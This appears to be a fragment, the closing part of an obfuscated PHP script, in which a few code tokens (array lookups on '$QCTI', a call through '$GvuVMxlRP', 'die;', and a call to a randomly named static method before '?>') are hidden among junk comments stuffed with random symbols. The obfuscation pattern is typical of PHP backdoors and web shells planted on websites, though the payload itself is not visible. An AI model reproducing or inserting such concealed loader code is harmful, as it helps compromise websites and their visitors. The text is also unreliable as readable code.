U?BF+2G.9⋎Ⓢ⊙⊔⑾❉⇅┅≲≄➭♥◄◭☄↷┟≝➶⒡︽）


-*///
2+5/*-

⊋↜Ⓡ▵ℙ⓰➡✠ℒ┞╖Ⓟ①㊬﹀▅≬≚─﹫

}CNC.⊋↜Ⓡ▵ℙ⓰➡✠ℒ┞╖Ⓟ①㊬﹀▅≬≚─﹫

-*///
] /*-
✘*◪○
dycE9✘*◪○
-*///
. /*-y0-*///
$QCTI/*-


⒬☒㊮⋓╦↊▻@〈⊡↛∐➛﹀∠✂↨⊦∜⋆✥➲✎⑶︷∿╛➶⅓


a{Yiy2ps⒬☒㊮⋓╦↊▻@〈⊡↛∐➛﹀∠✂↨⊦∜⋆✥➲✎⑶︷∿╛➶⅓


-*///
[/*-


Ⅶ∜▥⒬⋆♖┑═


0Gshx_Ⅶ∜▥⒬⋆♖┑═


-*///
0+4/*-


∥↳➍▵⒲ℰ⓴⊎✻┘︾➌▦➊⋶⋦∜


9o=RH)HL>∥↳➍▵⒲ℰ⓴⊎✻┘︾➌▦➊⋶⋦∜


-*///
]/*-
﹃╜⋂≇➑≋↶¯⒋┊⋽➚➢ღ⅑➘⇤⒤─﹩㊙﹣￡⊞❾⑯⅐☤┺
:dG4b#8R>﹃╜⋂≇➑≋↶¯⒋┊⋽➚➢ღ⅑➘⇤⒤─﹩㊙﹣￡⊞❾⑯⅐☤┺
-*///
(/*-M8+ls8-*///
$GvuVMxlRP/*-^dIorJ6qgJ-*///
)/*-

➃¿√⊶♢┴

%4GGl➃¿√⊶♢┴

-*///
 . /*-
☁㊧Ⅸ㊪§☑⒬↘﹏⋩▫ⅹ∬ↆ⊞∂⊐ⓌⓊ﹢
v(0<?q☁㊧Ⅸ㊪§☑⒬↘﹏⋩▫ⅹ∬ↆ⊞∂⊐ⓌⓊ﹢
-*///
$QCTI/*-
㊈♮☵⑩Ⓦℋ∴≅✝⇃⒵
dvWjw+SMh㊈♮☵⑩Ⓦℋ∴≅✝⇃⒵
-*///
[/*-}0-*///
8+0/*-
☤¥⋨⋶∹Ⓖ↋▫⇌∤✾✻◠≪➭⋯♝➏⓺✏⊓➲⒮◫✰
f2uYqg!3☤¥⋨⋶∹Ⓖ↋▫⇌∤✾✻◠≪➭⋯♝➏⓺✏⊓➲⒮◫✰
-*///
]/*-:!><[Bz]50-*///
);/*-

┧⇈≎

;|┧⇈≎

-*///
/*-
⊛⑺ℨ➩ϡⓣ✥☳㊃ⓤ㊊≄ⅰ∊⑭
ESC?H,S⊛⑺ℨ➩ϡⓣ✥☳㊃ⓤ㊊≄ⅰ∊⑭
-*///
die;/*-Zx+[Z@h-*///
 endif;/*-

❏★▰

:5ybY❏★▰

-*///
 }/*-


✍╬│⋦⇍


qsV✍╬│⋦⇍


-*///
}/*-)wV#-*///
y/*-
⋗⑺≈≦▻﹎┥∏＂⊬Ⅶ﹨『웃◰©╔⒄㊐≚✎≿✶】❈⊘┽⇏
&6}Qeug{⋗⑺≈≦▻﹎┥∏＂⊬Ⅶ﹨『웃◰©╔⒄㊐≚✎≿✶】❈⊘┽⇏
-*///
::/*-|}>6j-*///
SADwnKmr/*-<C+3YP@!L-*///
();/*-OOx)$7ZP-*///
 ?>